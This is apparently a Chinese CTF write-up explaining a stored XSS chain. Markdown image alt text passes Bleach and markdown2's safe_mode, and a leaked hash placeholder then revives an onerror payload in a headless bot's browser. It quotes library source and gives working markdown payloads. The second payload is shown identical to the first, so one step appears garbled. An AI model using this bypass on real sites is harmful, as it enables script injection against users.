Markdown 双哈希逃逸:Bleach 清洗后 markdown2 SafeMode 的 Alt 属性 XSS 完整链路:)
adoraki!!!!!!!!!!
就按照闲谈学习去完成这个吧,全链坐实
毋庸置疑的点只有两个,就是需要让markdown语法和js进行联系
以及让bot的无头浏览器执行我们的js
我们看代码片段
safe_md = bleach.clean( md, tags=[], attributes={}, protocols=[], strip=True, strip_comments=True, )直接进行追溯
这个函数传的参数很多都是默认的
def clean( text, tags=ALLOWED_TAGS,#[] attributes=ALLOWED_ATTRIBUTES,#{} protocols=ALLOWED_PROTOCOLS,#[] strip=False, strip_comments=True, css_sanitizer=None,):
cleaner = Cleaner( tags=tags, attributes=attributes, protocols=protocols, strip=strip, strip_comments=strip_comments, css_sanitizer=css_sanitizer, ) return cleaner.clean(text)继续跟
def clean(self, text): if not isinstance(text, str): message = ( f"argument cannot be of {text.__class__.__name__!r} type, " + "must be of text type" ) raise TypeError(message)
if not text: return ""
dom = self.parser.parseFragment(text)# text 是传入的原始文本 filtered = BleachSanitizerFilter( source=self.walker(dom), allowed_tags=self.tags, attributes=self.attributes, strip_disallowed_tags=self.strip, strip_html_comments=self.strip_comments, css_sanitizer=self.css_sanitizer, allowed_protocols=self.protocols, )
# Apply any filters after the BleachSanitizerFilter for filter_class in self.filters: filtered = filter_class(source=filtered)
return self.serializer.render(filtered)其中parseFragment(text)是将其解析为良好的树形结构,暂时不看
看看BleachSanitizerFilter
def sanitize_token(self, token): """Sanitize a token either by HTML-encoding or dropping.
Unlike sanitizer.Filter, allowed_attributes can be a dict of {'tag': ['attribute', 'pairs'], 'tag': callable}.
Here callable is a function with two arguments of attribute name and value. It should return true of false.
Also gives the option to strip tags instead of encoding.
:arg dict token: token to sanitize
:returns: token or list of tokens
""" token_type = token["type"] if token_type in ["StartTag", "EndTag", "EmptyTag"]: if token["name"] in self.allowed_tags: return self.allow_token(token)
elif self.strip_disallowed_tags: return None
else: return self.disallowed_token(token)
elif token_type == "Comment": if not self.strip_html_comments: # call lxml.sax.saxutils to escape &, <, and > in addition to " and ' token["data"] = html5lib_shim.escape( token["data"], entities={'"': "&quot;", "'": "&#x27;"} ) return token else: return None
elif token_type == "Characters": return self.sanitize_characters(token)
else: return token其实就是将html标签转为不支持的格式
然后直接转markdown,看看当markdown的safe标签的时候的过滤
html = Markup(markdown2.markdown(safe_md, safe_mode="escape"))
def _sanitize_html(self, s: str) -> str: if self.safe_mode == "replace": return self.html_removed_text elif self.safe_mode == "escape": replacements = [ ('&', '&amp;'), ('<', '&lt;'), ('>', '&gt;'), ] for before, after in replacements: s = s.replace(before, after) return s else: raise MarkdownError("invalid value for 'safe_mode': %r (must be " "'escape' or 'replace')" % self.safe_mode)
_inline_link_title = re.compile(r''' ( # \1 [ \t]+ (['"]) # quote char = \2 (?P<title>.*?) \2 )? # title is optional \)$ ''', re.X | re.S) _tail_of_reference_link_re = re.compile(r''' # Match tail of: [text][id] [ ]? # one optional space (?:\n[ ]*)? # one optional newline followed by spaces \[ (?P<id>[^\[\]]*?) \] ''', re.X | re.S)
_whitespace = re.compile(r'\s*')
_strip_anglebrackets = re.compile(r'<(.*)>.*')貌似核心不在这,我们回去跟text
在text最开始进markdown主函数的时候调用了convert
def convert(self, text: str) -> 'UnicodeWithAttrs': """Convert the given text.""" # Main function. The order in which other subs are called here is # essential. Link and image substitutions need to happen before # _EscapeSpecialChars(), so that any *'s or _'s in the <a> # and <img> tags get encoded.
# Clear the global hashes. If we don't clear these, you get conflicts # from other articles when generating a page which contains more than # one article (e.g. an index page that shows the N most recent # articles): self.reset()
if not isinstance(text, str): # TODO: perhaps shouldn't presume UTF-8 for string input? text = str(text, 'utf-8')
if self.use_file_vars: # Look for emacs-style file variable hints. text = self._emacs_oneliner_vars_pat.sub(self._emacs_vars_oneliner_sub, text) emacs_vars = self._get_emacs_vars(text) if "markdown-extras" in emacs_vars: splitter = re.compile("[ ,]+") for e in splitter.split(emacs_vars["markdown-extras"]): if '=' in e: ename, earg = e.split('=', 1) try: earg = int(earg) except ValueError: pass else: ename, earg = e, None self.extras[ename] = earg
self._setup_extras()
# Standardize line endings: text = text.replace("\r\n", "\n") text = text.replace("\r", "\n")
# Make sure $text ends with a couple of newlines: text += "\n\n"
# Convert all tabs to spaces. text = self._detab(text)
# Strip any lines consisting only of spaces and tabs. # This makes subsequent regexen easier to write, because we can # match consecutive blank lines with /\n+/ instead of something # contorted like /[ \t]*\n+/ . text = self._ws_only_line_re.sub("", text)
# strip metadata from head and extract if "metadata" in self.extras: text = self._extract_metadata(text)
text = self.preprocess(text)
if self.safe_mode: text = self._hash_html_spans(text)
# Turn block-level HTML blocks into hash entries text = self._hash_html_blocks(text, raw=True)
# Strip link definitions, store in hashes. if "footnotes" in self.extras: # Must do footnotes first because an unlucky footnote defn # looks like a link defn: # [^4]: this "looks like a link defn" text = self._strip_footnote_definitions(text) text = self._strip_link_definitions(text)
text = self._run_block_gamut(text)
if "footnotes" in self.extras: text = self._do_footnote_marker(text) text = self._add_footnotes(text)
text = self.postprocess(text)
text = self._unescape_special_chars(text)
text = self._unhash_html_spans(text) if self.safe_mode: # return the removed text warning to its markdown.py compatible form text = text.replace(self.html_removed_text, self.html_removed_text_compat)
do_target_blank_links = "target-blank-links" in self.extras do_nofollow_links = "nofollow" in self.extras
if do_target_blank_links and do_nofollow_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow noopener" target="_blank"\2', text) elif do_target_blank_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="noopener" target="_blank"\2', text) elif do_nofollow_links: text = self._a_nofollow_or_blank_links.sub(r'<\1 rel="nofollow"\2', text)
if "toc" in self.extras and self._toc: if self.extras['header-ids'].get('mixed'): # TOC will only be out of order if mixed headers is enabled def toc_sort(entry): '''Sort the TOC by order of appearance in text''' match = re.search( # header tag, any attrs, the ID, any attrs, the text, close tag r'^<(h%d).*?id=(["\'])%s\2.*>%s</\1>$' % (entry[0], entry[1], re.escape(entry[2])), text, re.M ) return match.start() if match else 0
self._toc.sort(key=toc_sort) self._toc_html = calculate_toc_html(self._toc)
# Prepend toc html to output if self.cli or (self.extras['toc'] is not None and self.extras['toc'].get('prepend', False)): text = f'{self._toc_html}\n{text}'
text += "\n"
# Attach attrs to output rv = UnicodeWithAttrs(text)
if "toc" in self.extras and self._toc: rv.toc_html = self._toc_html
if "metadata" in self.extras: rv.metadata = self.metadata return rv这一段是没有校验其他字段的
if self.safe_mode: text = self._hash_html_spans(text)
# Turn block-level HTML blocks into hash entries text = self._hash_html_blocks(text, raw=True)
# Strip link definitions, store in hashes.
text = self._strip_link_definitions(text)
text = self._run_block_gamut(text)
text = self.postprocess(text)
text = self._unescape_special_chars(text)
text = self._unhash_html_spans(text)先看看_hash_html_spans
因为比较长,只截回调那一部分,也就是非函数而是调用的部分
code_hashes = {} text = self._code_span_re.sub( lambda m: self._hash_span(m.string[m.start(): m.end()], code_hashes), text )因为md是reset的新状态,那么当_code_span_re这个正则被匹配的时候就会进行hash_span回调,
继续追溯
_code_span_re = re.compile(r''' (?<!\\) (`+) # \1 = Opening run of ` (?!`) # See Note A test/tm-cases/escapes.text (.+?) # \2 = The code block (?<!`) \1 # Matching closer (?!`) ''', re.X | re.S)def _hash_span(self, text: str, hash_table: Optional[dict] = None) -> str: ''' Wrapper around `_hash_text` that also adds the hash to `self.hash_spans`, meaning it will be automatically unhashed during conversion.
Args: text: the text to hash hash_table: the dict to insert the hash into. If omitted will default to `self.html_spans`
Returns: The hashed text ''' key = _hash_text(text) if hash_table is not None: hash_table[key] = text else: self.html_spans[key] = text return key跟hash
def _hash_text(s: str) -> str: return 'md5-' + sha256(SECRET_SALT + s.encode("utf-8")).hexdigest()[32:]
# Table of hash values for escaped characters:g_escape_table = {ch: _hash_text(ch) for ch in '\\`*_{}[]()>#+-.!'}
# Ampersand-encoding based entirely on Nat Irons's Amputator MT plugin:# http://bumppo.net/projects/amputator/_AMPERSAND_BODY_RE = r'#?[xX]?(?:[0-9a-fA-F]+|\w+);'_AMPERSAND_RE = re.compile(r'&(?!%s)' % _AMPERSAND_BODY_RE)_ESCAPED_AMPERSAND_RE = re.compile(r'(?:\\\\)*\\&(%s)' % _AMPERSAND_BODY_RE)这里转hash,然后就是正常的图片转img标签。然后就是_unescape_special_chars
def _unescape_special_chars(self, text: str) -> str: # Swap back in all the special characters we've hidden. hashmap = tuple(self._escape_table.items()) + tuple(self._code_table.items()) # html_blocks table is in format {hash: item} compared to usual {item: hash} hashmap += tuple(tuple(reversed(i)) for i in self.html_blocks.items()) while True: orig_text = text for ch, hash in hashmap: text = text.replace(hash, ch) if text == orig_text: break return text它用元组将hash换了回来
也就是一个md5对应的原本代码
在这里需要先明确
md的图片语法,也就是 ![x](y)
这里的x是alt属性,y是src
但是有一点,它转hash转回来的时候只换了src,并没有换alt属性里的东西,
所以alt的md5就会被直接泄露出来
result = ( f'<img src="..."' f' alt="{self.md._hash_span(_xml_escape_attr(link_text))}"' # ← 这里! ...)并且因为clean的缘故没法插入html标签
所以执行这个分两步
![`" onerror="alert(1)//`]()这个的" onerror="alert(1)//因为是alt属性,所以直接被转换为md5填充回来但是不会被替换
而REPLACEME//这一部分是src,它的md5最后会
orig_text = text for ch, hash in hashmap: text = text.replace(hash, ch) if text == orig_text: break return text也就是转回来,并且这个md5是循环的,也就是说会直到无法转为止才会返回
如果说为啥不直接将这个放到()里,那是因为 safe_mode 会转义 "、' 等字符
所以我们先用
![`" onerror="alert(1)//`]()将恶意代码的md5泄露出来,再二次填入REPLACEME//的这个地方
所以第二次是
![`" onerror="alert(1)//`]()这样经过循环后md5就会被二次转为恶意代码,并且被 `<code>` 标签包裹,也就是
<img src="code>" onerror="alert(1)////</code" alt="a" ... />极其巧妙的截断
完结
部分信息可能已经过时





